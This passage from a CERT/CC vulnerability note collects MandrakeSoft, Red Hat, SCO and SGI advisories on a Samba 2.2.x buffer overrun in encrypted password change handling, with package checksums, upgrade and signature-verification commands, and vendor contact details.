________________________________________________________________ \n-----End of Document ID: HPSBUX0212-231--------------------------------------`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ MandrakeSoft\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`________________________________________________________________________ \n` \n` Mandrake Linux Security Update Advisory \n________________________________________________________________________ \n` \n`Package name: samba \nAdvisory ID: MDKSA-2002:081 \nDate: November 25th, 2002 \n` \n`Affected versions: 8.1, 8.2, 9.0 \n________________________________________________________________________ \n` \n`Problem Description: \n` \n` A vulnerability in samba versions 2.2.2 through 2.2.6 was discovered \nby the Debian samba maintainers. A bug in the length checking for \nencrypted password change requests from clients could be exploited \nusing a buffer overrun attack on the smbd stack. This attack would \nhave to crafted in such a way that converting a DOS codepage string to \nlittle endian UCS2 unicode would translate into an executable block of \ncode. \n` \n` This vulnerability has been fixed in samba version 2.2.7, and the \nupdated packages have had a patch applied to fix the problem. \n________________________________________________________________________ \n` \n`References: \n` \n` ``<http://www.samba.org/samba/whatsnew/samba-2.2.7.html>`` \n________________________________________________________________________ \n` \n`Updated Packages: \n` \n` Mandrake Linux 8.1: \nb10451e71a1ba27d45956f57fb203118 8.1/RPMS/samba-2.2.2-3.3mdk.i586.rpm \n22a6f9977518bbe2923ec7d2f68a698e 8.1/RPMS/samba-client-2.2.2-3.3mdk.i586.rpm \n74d59e5578aaa0a23e760c828a6d8688 8.1/RPMS/samba-common-2.2.2-3.3mdk.i586.rpm \n6d6a2835fd6e21b4c93dbaa5fe6f2d13 8.1/RPMS/samba-doc-2.2.2-3.3mdk.i586.rpm \n4c7511781a263f633cab5bf1831ad69b 8.1/SRPMS/samba-2.2.2-3.3mdk.src.rpm \n` \n` Mandrake Linux 8.1/IA64: \n2456e2af90d2e71e877a16f2ff034c73 ia64/8.1/RPMS/samba-2.2.2-3.3mdk.ia64.rpm \n66043b111988d82d2800763950ea07e3 ia64/8.1/RPMS/samba-client-2.2.2-3.3mdk.ia64.rpm \n6954d750eae921eece5e1e2ece9c42e5 ia64/8.1/RPMS/samba-common-2.2.2-3.3mdk.ia64.rpm \ncf5545988b8d07299b776a25d6dc2e56 ia64/8.1/RPMS/samba-doc-2.2.2-3.3mdk.ia64.rpm \n4c7511781a263f633cab5bf1831ad69b ia64/8.1/SRPMS/samba-2.2.2-3.3mdk.src.rpm \n` \n` Mandrake Linux 8.2: \n5552fadd8509fc7222099f88dad0f5a9 8.2/RPMS/nss_wins-2.2.3a-10.1mdk.i586.rpm \n58da182a9a84a02010ddaf939e97bc7c 8.2/RPMS/samba-2.2.3a-10.1mdk.i586.rpm \n91dcff33758dca1ca9a4779186a6917d 8.2/RPMS/samba-client-2.2.3a-10.1mdk.i586.rpm \nce98076728c73ca79b78fc9d69b94b47 8.2/RPMS/samba-common-2.2.3a-10.1mdk.i586.rpm \n983c2de083b240971026bb054b449fde 8.2/RPMS/samba-doc-2.2.3a-10.1mdk.i586.rpm \nfe4c7a8ebedede8ac10ff98eac2b84a5 8.2/RPMS/samba-swat-2.2.3a-10.1mdk.i586.rpm \nec00eed80e135dd79b56608bbd2c0574 8.2/RPMS/samba-winbind-2.2.3a-10.1mdk.i586.rpm \n5677dee51659f50acee4e55346ca737d 8.2/SRPMS/samba-2.2.3a-10.1mdk.src.rpm \n` \n` Mandrake Linux 8.2/PPC: \n32e41a8c06f1b5b24b13de0f65dfa3cc ppc/8.2/RPMS/nss_wins-2.2.3a-10.1mdk.ppc.rpm \n275bf7b8a2792e11bf94dc24557f8ebc ppc/8.2/RPMS/samba-2.2.3a-10.1mdk.ppc.rpm \n66232f77afcacc83090e3cf848717962 ppc/8.2/RPMS/samba-client-2.2.3a-10.1mdk.ppc.rpm \n912ccb4cc81f89de6de871aa1c4833c0 ppc/8.2/RPMS/samba-common-2.2.3a-10.1mdk.ppc.rpm \naf73612d4ea52c4a391ca75afd0dae8b ppc/8.2/RPMS/samba-doc-2.2.3a-10.1mdk.ppc.rpm \n2117cd7af96f6467c867faef73a425b6 ppc/8.2/RPMS/samba-swat-2.2.3a-10.1mdk.ppc.rpm \nab0402b7173a04be1cbc6c415807b98a ppc/8.2/RPMS/samba-winbind-2.2.3a-10.1mdk.ppc.rpm \n5677dee51659f50acee4e55346ca737d ppc/8.2/SRPMS/samba-2.2.3a-10.1mdk.src.rpm \n` \n` Mandrake Linux 9.0: \n25b264e1b5ee43b26d861f5b5e07d7d2 9.0/RPMS/nss_wins-2.2.7-2.1mdk.i586.rpm \n619a0506a84d25099ca0653be0f5fd3a 9.0/RPMS/samba-client-2.2.7-2.1mdk.i586.rpm \nd7ed710067f71285cc616fe07efd7753 9.0/RPMS/samba-common-2.2.7-2.1mdk.i586.rpm \n2b5667097a398ef87e9e721c26bb613b 9.0/RPMS/samba-doc-2.2.7-2.1mdk.i586.rpm \nff124b4103dd84e51f5be82dd9244b1f 9.0/RPMS/samba-server-2.2.7-2.1mdk.i586.rpm \na7b976a81f59d7ce7111cb5f44d89bcd 9.0/RPMS/samba-swat-2.2.7-2.1mdk.i586.rpm \n0859d8665e9d2ea2f1f96365a7456e3f 9.0/RPMS/samba-winbind-2.2.7-2.1mdk.i586.rpm \nb93cd8ca9319a628ee7015bbd5d2196e 9.0/SRPMS/samba-2.2.7-2.1mdk.src.rpm \n________________________________________________________________________ \n` \n`Bug IDs fixed (see ``<https://qa.mandrakesoft.com>`` for more information): \n________________________________________________________________________ \n` \n`To upgrade automatically, use MandrakeUpdate. The verification of md5 \nchecksums and GPG signatures is performed automatically for you. \n` \n`If you want to upgrade manually, download the updated package from one \nof our FTP server mirrors and upgrade with \"rpm -Fvh *.rpm\". A list of \nFTP mirrors can be obtained from: \n` \n` ``<http://www.mandrakesecure.net/en/ftp.php>`` \n` \n`Please verify the update prior to upgrading to ensure the integrity of \nthe downloaded package. You can do this with the command: \n` \n` rpm --checksig <filename> \n` \n`All packages are signed by MandrakeSoft for security. You can obtain \nthe GPG public key of the Mandrake Linux Security Team from: \n` \n` ``<https://www.mandrakesecure.net/RPM-GPG-KEYS>`` \n` \n`Please be aware that sometimes it takes the mirrors a few hours to \nupdate. \n` \n`You can view other update advisories for Mandrake Linux at: \n` \n` ``<http://www.mandrakesecure.net/en/advisories/>`` \n` \n`MandrakeSoft has several security-related mailing list services that \nanyone can subscribe to. Information on these lists can be obtained by \nvisiting: \n` \n` ``<http://www.mandrakesecure.net/en/mlist.php>`` \n` \n`If you want to report vulnerabilities, please contact \n` \n` security_linux-mandrake.com \n` \n`Type Bits/KeyID Date User ID \npub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team \n<security linux-mandrake.com> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday \nL4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 \nWKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo \nP0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl \nhynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx \nPFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg \n2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs \niyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD \nLLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu \nZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t \nPohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy \n/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA \nBgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP \nWdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w \nPk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA \nBgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H \n8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K \n+jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy \nYWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j \nb20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmFi+ \nAJsHhohgnU3ik4+gy3EdFlB2i/MBoACg6lHn5cnVvTcmgNccWxeNxLLZI5e5AQ0E \nOWnn7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ \n9F779FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzR \nxBXVJb57fFQjxOu4eNjZAtfII/YXb0uyXXrdr5dlJ/3eXrcO4p0XAAMFBACCxo6Z \n269s+A4v8C6Ui12aarOQcCDlV8cVG9LkyatU3FNTlnasqwo6EkaP572448weJWwN \n6SCXVl+xOYLiK0hL/6Jb/O9Agw75yUVdk+RMM2I4fNEi+y4hmfMh2siBv8yEkEvZ \njTcl3TpkTfzYky85tu433wmKaLFOv0WjBFSikohGBBgRAgAGBQI5aefvAAoJEJqo \n0NAiRYqYid0AoJgeWzXrEdIClBOSW5Q6FzqJJyaqAKC0Y9YI3UFlE4zSIGjcFlLJ \nEJGXlA== \n=yGlX \n- -----END PGP PUBLIC KEY BLOCK----- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iD8DBQE94uCrmqjQ0CJFipgRAtH9AKDZ5fi6/mGdx4HldnVAgaWwTGSzDgCg53+K \nXVuJ3G64lSEO7Q2wvP4C2zo= \n=CVQZ \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Red Hat Inc.\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`--------------------------------------------------------------------- \nRed Hat, Inc. Red Hat Security Advisory \n`\n\n`Synopsis: New samba packages available to fix potential security vulnerability \nAdvisory ID: RHSA-2002:266-05 \nIssue date: 2002-11-22 \nUpdated on: 2002-11-21 \nProduct: Red Hat Linux \nKeywords: samba security encrypted password change \nCross references: \nObsoletes: \n--------------------------------------------------------------------- \n` \n`1. Topic: \n` \n`New samba packages are available that fix a security vulnerability present \nin samba versions 2.2.2 through 2.2.6. A potential attacker could gain \nroot access on the target machine. It is strongly encouraged that all Samba \nusers update to the fixed packages. \n` \n`As of this time, there are no known exploits for this vulnerability. \n` \n`2. Relevant releases/architectures: \n` \n`Red Hat Linux 7.3 - i386 \nRed Hat Linux 8.0 - i386 \n` \n`3. Problem description: \n` \n`There was a bug in the length checking for encrypted password change \nrequests from clients. A client could potentially send an encrypted \npassword, which, when decrypted with the old hashed password, could be \nused as a buffer overrun attack on smbd's stack. The attack would \nhave to be crafted such that converting a DOS codepage string to little \nendian UCS2 unicode would translate into an executable block of code. \n` \n`Thanks to the Debian Samba maintainers for discovering this issue, and to \nthe Samba team for providing the fix (and the problem description text above.) \n` \n`4. Solution: \n` \n`Before applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n` \n`To update all RPMs for your particular architecture, run: \n` \n`rpm -Fvh [filenames] \n` \n`where [filenames] is a list of the RPMs you wish to upgrade. Only those \nRPMs which are currently installed will be updated. Those RPMs which are \nnot installed but included in the list will not be updated. Note that you \ncan also use wildcards (*.rpm) if your current directory *only* contains the \ndesired RPMs. \n` \n`Please note that this update is also available via Red Hat Network. Many \npeople find this an easier way to apply updates. To use Red Hat Network, \nlaunch the Red Hat Update Agent with the following command: \n` \n`up2date \n` \n`This will start an interactive process that will result in the appropriate \nRPMs being upgraded on your system. \n` \n`5. RPMs required: \n` \n`Red Hat Linux 7.3: \n` \n`SRPMS: \n``<ftp://updates.redhat.com/7.3/en/os/SRPMS/samba-2.2.7-1.7.3.src.rpm>`` \n` \n`i386: \n``<ftp://updates.redhat.com/7.3/en/os/i386/samba-2.2.7-1.7.3.i386.rpm>`` \n``<ftp://updates.redhat.com/7.3/en/os/i386/samba-common-2.2.7-1.7.3.i386.rpm>`` \n``<ftp://updates.redhat.com/7.3/en/os/i386/samba-client-2.2.7-1.7.3.i386.rpm>`` \n``<ftp://updates.redhat.com/7.3/en/os/i386/samba-swat-2.2.7-1.7.3.i386.rpm>`` \n` \n`Red Hat Linux 8.0: \n` \n`SRPMS: \n``<ftp://updates.redhat.com/8.0/en/os/SRPMS/samba-2.2.7-2.src.rpm>`` \n` \n`i386: \n``<ftp://updates.redhat.com/8.0/en/os/i386/samba-2.2.7-2.i386.rpm>`` \n``<ftp://updates.redhat.com/8.0/en/os/i386/samba-common-2.2.7-2.i386.rpm>`` \n``<ftp://updates.redhat.com/8.0/en/os/i386/samba-client-2.2.7-2.i386.rpm>`` \n``<ftp://updates.redhat.com/8.0/en/os/i386/samba-swat-2.2.7-2.i386.rpm>`` \n` \n \n \n`6. Verification: \n` \n`MD5 sum Package Name \n-------------------------------------------------------------------------- \n5c8ba729bb3e6d2f0614fd543053e6e9 7.3/en/os/SRPMS/samba-2.2.7-1.7.3.src.rpm \n92178f0aa6c7ec0cb2b55c0f32c59ca4 7.3/en/os/i386/samba-2.2.7-1.7.3.i386.rpm \n6915d467d9572737dfbfcac916734084 7.3/en/os/i386/samba-client-2.2.7-1.7.3.i386.rpm \n56ce43d49614bf5a79b90dfbd4a77235 7.3/en/os/i386/samba-common-2.2.7-1.7.3.i386.rpm \n82cbcb8e2c3be661e0e6c1c7f9856ecd 7.3/en/os/i386/samba-swat-2.2.7-1.7.3.i386.rpm \n9b5ded05dc9cc2c49c40b686ec78caf7 8.0/en/os/SRPMS/samba-2.2.7-2.src.rpm \n4e2339d23bad01690938748d84dac186 8.0/en/os/i386/samba-2.2.7-2.i386.rpm \na7a48f9d6d8e45966172ae1b941e0208 8.0/en/os/i386/samba-client-2.2.7-2.i386.rpm \n3bd309562e0cdefc8d4cd5b02ee0b71c 8.0/en/os/i386/samba-common-2.2.7-2.i386.rpm \n0efdfc0d8de8294c0dd4978a82d15991 8.0/en/os/i386/samba-swat-2.2.7-2.i386.rpm \n` \n \n`These packages are GPG signed by Red Hat, Inc. for security. Our key \nis available at ``<http://www.redhat.com/about/contact/pgpkey.html>`` \n` \n`You can verify each package with the following command: \n` \n` rpm --checksig -v <filename> \n` \n`If you only wish to verify that each package has not been corrupted or \ntampered with, examine only the md5sum with the following command: \n` \n` md5sum <filename> \n` \n`7. Contact: \n` \n`The Red Hat security contact is <security@redhat.com>. More contact \ndetails at ``<http://www.redhat.com/solutions/security/news/contact.html>`` \n` \n`Copyright(c) 2000, 2001, 2002 Red Hat, Inc.`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ SCO\n\nUpdated: May 05, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`SCO Security Advisory \n`\n\n`Subject:OpenLinux: Various serious Samba vulnerabilities \nAdvisory number: CSSA-2003-017.0 \nIssue date: 2003 May 02 \nCross reference: \n______________________________________________________________________________ \n` \n \n`1. Problem Description \n` \n`This update addresses the following Samba issues: \n` \n`A bug in the length checking for encrypted password change \nrequests from clients could be exploited using a buffer \noverrun attack on the smbd stack.` \n \n`A vulnerability that could lead to an anonymous user gaining \nroot access on a Samba serving system.` \n \n`A chown race condition that could allow overwriting of \ncritical system files if exploited.` \n \n`A buffer overflow in the call_trans2open function in trans2.c \nallows remote attackers to execute arbitrary code.` \n \n`Multiple buffer overflows that may allow remote attackers to \nexecute arbitrary code or cause a denial of service.` \n \n \n`2. Vulnerable Supported Versions \n` \n`SystemPackage \n----------------------------------------------------------------------` \n \n`OpenLinux 3.1.1 Serverprior to libsmbclient-2.2.2-7.i386.rpm \nprior to samba-2.2.2-7.i386.rpm \nprior to samba-doc-2.2.2-7.i386.rpm \nprior to smbfs-2.2.2-7.i386.rpm \nprior to swat-2.2.2-7.i386.rpm` \n \n`OpenLinux 3.1.1 Workstationprior to libsmbclient-2.2.2-7.i386.rpm \nprior to samba-2.2.2-7.i386.rpm \nprior to samba-doc-2.2.2-7.i386.rpm \nprior to smbfs-2.2.2-7.i386.rpm \nprior to swat-2.2.2-7.i386.rpm` \n \n \n`3. Solution \n` \n`The proper solution is to install the latest packages. Many \ncustomers find it easier to use the Caldera System Updater, called \ncupdate (or kcupdate under the KDE environment), to update these \npackages rather than downloading and installing them by hand.` \n \n \n`4. OpenLinux 3.1.1 Server \n` \n`4.1 Package Location \n` \n`<ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2003-017.0/RPMS>`` \n` \n`4.2 Packages \n` \n`a4f667678f6a3c283491ae04480625d6libsmbclient-2.2.2-7.i386.rpm \n8c95e0b81771bb703e08937125e8c9bfsamba-2.2.2-7.i386.rpm \n2a590b5458186279fd3bb17bb87c5af3samba-doc-2.2.2-7.i386.rpm \nfcabaf8b0567ed5faad0e2fe8e206f92smbfs-2.2.2-7.i386.rpm \nbd13c1771c2267549916f3afb60ad019swat-2.2.2-7.i386.rpm` \n \n`4.3 Installation \n` \n`rpm -Fvh libsmbclient-2.2.2-7.i386.rpm \nrpm -Fvh samba-2.2.2-7.i386.rpm \nrpm -Fvh samba-doc-2.2.2-7.i386.rpm \nrpm -Fvh smbfs-2.2.2-7.i386.rpm \nrpm -Fvh swat-2.2.2-7.i386.rpm` \n \n`4.4 Source Package Location \n` \n`<ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2003-017.0/SRPMS>`` \n` \n`4.5 Source Packages \n` \n`403ddcea6384a309768066e06941a68fsamba-2.2.2-7.src.rpm \n` \n \n`5. OpenLinux 3.1.1 Workstation \n` \n`5.1 Package Location \n` \n`<ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2003-017.0/RPMS>`` \n` \n`5.2 Packages \n` \n`c04cb8377d18180c6b914ed9d0d1d4e3libsmbclient-2.2.2-7.i386.rpm \naad7fa4db863931a9c57b8720e17cbb6samba-2.2.2-7.i386.rpm \nbe052cbf6e77f05ad1cbc7fba57be7bdsamba-doc-2.2.2-7.i386.rpm \n4bf70f287baf74e47ef5cff351a7a740smbfs-2.2.2-7.i386.rpm \n906d1705b64767cd774e29287b5ab437swat-2.2.2-7.i386.rpm` \n \n`5.3 Installation \n` \n`rpm -Fvh libsmbclient-2.2.2-7.i386.rpm \nrpm -Fvh samba-2.2.2-7.i386.rpm \nrpm -Fvh samba-doc-2.2.2-7.i386.rpm \nrpm -Fvh smbfs-2.2.2-7.i386.rpm \nrpm -Fvh swat-2.2.2-7.i386.rpm` \n \n`5.4 Source Package Location \n` \n`<ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2003-017.0/SRPMS>`` \n` \n`5.5 Source Packages \n` \n`21c0df3f652692c3db10dd5783e78e93samba-2.2.2-7.src.rpm \n` \n \n`6. References \n` \n`Specific references for this advisory: \n` \n`<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1318>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0085>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0086>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0196>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201>` \n \n`SCO security resources: \n` \n`<http://www.sco.com/support/security/index.html>`` \n` \n`This security fix closes SCO incidents sr876764, sr875830, \nsr872195, fz527679, fz527532, fz526744, erg712283, erg712263, \nerg712169.` \n \n \n`7. Disclaimer \n` \n`SCO is not responsible for the misuse of any of the information \nwe provide on this website and/or through our security \nadvisories. Our advisories are a service to our customers intended \nto promote secure installation and use of SCO products.` \n \n \n`8. Acknowledgements \n` \n`Steve Langasek (Debian), Sebastian Krahmer (SuSE), and Digital \nDefense Inc. discovered and researched these vulnerabilities.`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ SGI\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \nSGI Security Advisory \n` \n`Title : Samba Security Vulnerability \nNumber : 20021204-01-I \nDate : December 5, 2002 \nReference: CVE CAN-2002-1318 \nReference: SGI BUG 874162 \nFixed in : Samba v2.2.7 \n______________________________________________________________________________ \n` \n`- ----------------------- \n- --- Issue Specifics --- \n- ----------------------- \n` \n`It's been reported that versions of Samba prior to 2.2.7 have a security \nvulnerability that could potentially allow an attacker to gain root access \non the target machine. The word \"potentially\" is used because there \nis no known exploit of this bug. SGI has not found one, nor has the Samba \ngroup found one. Nevertheless, the vulnerability is considered serious. \n` \n`See ``<http://www.samba.org/samba/whatsnew/samba-2.2.7.html>`` for additional \ndetails. \n` \n`This vulnerability was assigned the following CVE candidate: \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1318>`` \n` \n`SGI has investigated the issue and recommends the following steps for \nneutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be \nimplemented on ALL vulnerable SGI systems. \n` \n`These issues have been corrected in Samba version 2.2.7. \n` \n \n`- -------------- \n- --- Impact --- \n- -------------- \n` \n`Samba is an optional product, and is not installed by default on IRIX 6.5 \nsystems. \n` \n`To determine the version of IRIX you are running, execute the following \ncommand: \n` \n` # /bin/uname -R \n` \n`That will return a result similar to the following: \n` \n` # 6.5 6.5.16f \n` \n`The first number (\"6.5\") is the release name, the second (\"6.5.16f\" in this \ncase) is the extended release name. The extended release name is the \n\"version\" we refer to throughout this document. \n` \n`To see if samba is installed, execute the following command: \n` \n`% versions samba_irix \nI = Installed, R = Removed \n` \n` Name Date Description \n` \n` I samba_irix 07/02/2002 Samba 2.2.4 for IRIX \nI samba_irix.man 07/02/2002 Samba Online Documentation \nI samba_irix.man.doc 07/02/2002 Samba 2.2.4 Documentation \nI samba_irix.man.manpages 07/02/2002 Samba 2.2.4 Man Page \nI samba_irix.man.relnotes 07/02/2002 Samba 2.2.4 Release Notes \nI samba_irix.src 07/02/2002 Samba Source Code \nI samba_irix.src.samba 07/02/2002 Samba 2.2.4 Source Code \nI samba_irix.sw 07/02/2002 Samba Execution Environment \nI samba_irix.sw.base 07/02/2002 Samba 2.2.4 Execution Environment \n` \n`If the result is similar to the above and the version shown is less than \n2.2.7, then the system is vulnerable. \n` \n`- ---------------------------- \n- --- Temporary Workaround --- \n- ---------------------------- \n` \n`There is no effective workaround available for these problems if Samba is \nrequired. SGI recommends upgrading to Samba version 2.2.7. \n` \n \n`- ---------------- \n- --- Solution --- \n- ---------------- \n` \n`SGI has provided an instable version of Samba for this vulnerability. Our \nrecommendation is to upgrade to Samba version 2.2.7. \n` \n`Samba 2.2.7 can be downloaded from ``<http://www.samba.org/>`` or \n``<http://freeware.sgi.com/>`` \n` \n`For customers who have purchased the SGI supported version of Samba, \nplease contact your SGI Support Representative and request part \nnumber 812-0893-008 -- Samba 2.2.7 for IRIX on CD. \n` \n \n` OS Version Vulnerable? Patch # Other Actions \n---------- ----------- ------- ------------- \nIRIX 3.x unknown Note 1 \nIRIX 4.x unknown Note 1 \nIRIX 5.x unknown Note 1 \nIRIX 6.0.x unknown Note 1 \nIRIX 6.1 unknown Note 1 \nIRIX 6.2 unknown Note 1 \nIRIX 6.3 unknown Note 1 \nIRIX 6.4 unknown Note 1 \nIRIX 6.5 yes Notes 2 & 3 \nIRIX 6.5.1 yes Notes 2 & 3 \nIRIX 6.5.2 yes Notes 2 & 3 \nIRIX 6.5.3 yes Notes 2 & 3 \nIRIX 6.5.4 yes Notes 2 & 3 \nIRIX 6.5.5 yes Notes 2 & 3 \nIRIX 6.5.6 yes Notes 2 & 3 \nIRIX 6.5.7 yes Notes 2 & 3 \nIRIX 6.5.8 yes Notes 2 & 3 \nIRIX 6.5.9 yes Notes 2 & 3 \nIRIX 6.5.10 yes Notes 2 & 3 \nIRIX 6.5.11 yes Notes 2 & 3 \nIRIX 6.5.12 yes Notes 2 & 3 \nIRIX 6.5.13 yes Notes 2 & 3 \nIRIX 6.5.14 yes Notes 2 & 3 \nIRIX 6.5.15 yes Notes 2 & 3 \nIRIX 6.5.16 yes Notes 2 & 3 \nIRIX 6.5.17 yes Notes 2 & 3 \nIRIX 6.5.18 yes Notes 2 & 3 \n` \n` NOTES \n` \n` 1) This version of the IRIX operating has been retired. Upgrade to an \nactively supported IRIX operating system. See \n``<http://support.sgi.com/irix/news/index.html#policy>`` for more \ninformation. \n` \n` 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your \nSGI Support Provider or URL: ``<http://support.sgi.com/irix/swupdates/>`` \n` \n` 3) This version of IRIX is vulnerable if a version of Samba prior to \n2.2.7 is installed. Please install Samba 2.2.7. \n` \n \n`- ------------------------ \n- --- Acknowledgments ---- \n- ------------------------ \n` \n`SGI wishes to thank Steve Langasek, Eloy Paris, the Samba Group and the \nusers of the Internet Community at large for their assistance in this \nmatter. \n` \n \n`- ------------- \n- --- Links --- \n- ------------- \n` \n`SGI Security Advisories can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/advisories/>`` \n` \n`SGI Security Patches can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/patches/>`` \n` \n`SGI patches for IRIX can be found at the following patch servers: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/>`` \n` \n`SGI freeware updates for IRIX can be found at: \n``<http://freeware.sgi.com/>`` \n` \n`SGI fixes for SGI open sourced code can be found on: \n``<http://oss.sgi.com/projects/>`` \n` \n`SGI patches and RPMs for Linux can be found at: \n``<http://support.sgi.com/linux/>`` or \n``<http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/>`` \n` \n`SGI patches for Windows NT or 2000 can be found at: \n``<http://support.sgi.com/nt/>`` \n` \n`IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/support/patchset/>`` \n` \n`IRIX 6.5 Maintenance Release Streams can be found at: \n``<http://support.sgi.com/colls/patches/tools/relstream/index.html>`` \n` \n`IRIX 6.5 Software Update CDs can be obtained from: \n``<http://support.sgi.com/irix/swupdates/>`` \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`For security and patch management reasons, ftp.sgi.com (mirrors \npatches.sgi.com security FTP repository) lags behind and does not do a \nreal-time update. \n` \n \n`- ----------------------------------------- \n- --- SGI Security Information/Contacts --- \n- ----------------------------------------- \n` \n`If there are questions about this document, email can be sent to \nsecurity-info@sgi.com. \n` \n` ------oOo------ \n` \n`SGI provides security information and patches for use by the entire SGI \ncommunity. This information is freely available to any person needing the \ninformation and is available via anonymous FTP and the Web. \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`The SGI Security Headquarters Web page is accessible at the URL: \n``<http://www.sgi.com/support/security/>`` \n` \n`For issues with the patches on the FTP sites, email can be sent to \nsecurity-info@sgi.com. \n` \n`For assistance obtaining or working with security patches, please \ncontact your SGI support provider. \n` \n` ------oOo------ \n` \n`SGI provides a free security mailing list service called wiretap and \nencourages interested parties to self-subscribe to receive (via email) all \nSGI Security Advisories when they are released. Subscribing to the mailing \nlist can be done via the Web \n(``<http://www.sgi.com/support/security/wiretap.html>``) or by sending email to \nSGI as outlined below. \n` \n`% mail wiretap-request@sgi.com \nsubscribe wiretap <YourEmailAddress such as zedwatch@sgi.com > \nend \n^d \n` \n`In the example above, <YourEmailAddress> is the email address that you wish \nthe mailing list information sent to. The word end must be on a separate \nline to indicate the end of the body of the message. The control-d (^d) is \nused to indicate 